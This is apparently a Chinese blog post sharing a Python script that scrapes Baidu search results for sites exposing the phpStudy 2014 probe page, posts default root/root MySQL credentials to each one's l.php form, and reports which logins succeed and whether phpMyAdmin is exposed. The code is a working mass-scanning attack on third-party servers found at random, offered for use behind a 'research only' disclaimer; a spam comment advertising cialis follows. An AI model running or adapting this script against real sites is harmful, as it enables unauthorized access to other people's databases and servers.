百度批量phpstudy探针mysql弱口令检测脚本

源码 81 字 大概 1 分钟 390 次

使用截图

1.png

贴上代码

# -*- coding: UTF-8 -*-
import requests
import re

def exp():
    expurls=expurl+'/l.php'
    try:
        s=requests.get(url=expurls,timeout=5)
        if s.status_code == 200:
            headers={'Content-Type':'application/x-www-form-urlencoded'}
            data = 'host=localhost&port=3306&login=root&password=root&act=MySQL%E6%A3%80%E6%B5%8B&funName='
            resonse = requests.post(url=expurls, data=data,headers= headers)
            ret=re.findall('<script>alert(.*)</script>',resonse.text)
            if '(\'连接到MySql数据库正常\')' in ret:
                v=requests.get(url=expurl+'/phpmyadmin/index.php',timeout=5)
                if v.status_code ==200:
                    print(expurl+' - mysql连接成功,phpmyadmin存在')
                else:
                    print(expurl +" - mysql连接成功,phpmyadmin不不不存在")
            else:
                print(expurl +"  -  ConnectError!")
        else:
            print(expurl+'  -   NotExist!')
    except:
        print(expurl+"  -  UnkonwnError!")


def main():
    for i in range(0,1000,10):
        url='https://www.baidu.com/s?wd=phpStudy 探针 2014&pn=%s'%(str(i))
        requests.adapters.DEFAULT_RETRIES = 5
        headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0','Content-Type':'application/x-www-form-urlencoded'}
        ret=requests.get(url=url,headers=headers,timeout=10)
        urls=re.findall('class=\"c-showurl\" style=\"text-decoration:none;\">(.*)/&nbsp;</a>',ret.text)
        global expurl
        for urll in urls:
            if 'https://' in urll:
                expurl=urll
                exp()
            else:
                expurl='http://'+urll
                exp()

if __name__ == "__main__":
    global expurl
    main()

使用声明

验证:root / root 具体自己更改
版权没有,翻版不究
仅供研究使用,不得用于非法行为,所带来的法律责任由使用者承担!

文章目录
END

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可。

仅有 1 条感想

  1. insulsido 游客 回复
    2021-08-01 17:35

    cialis dosage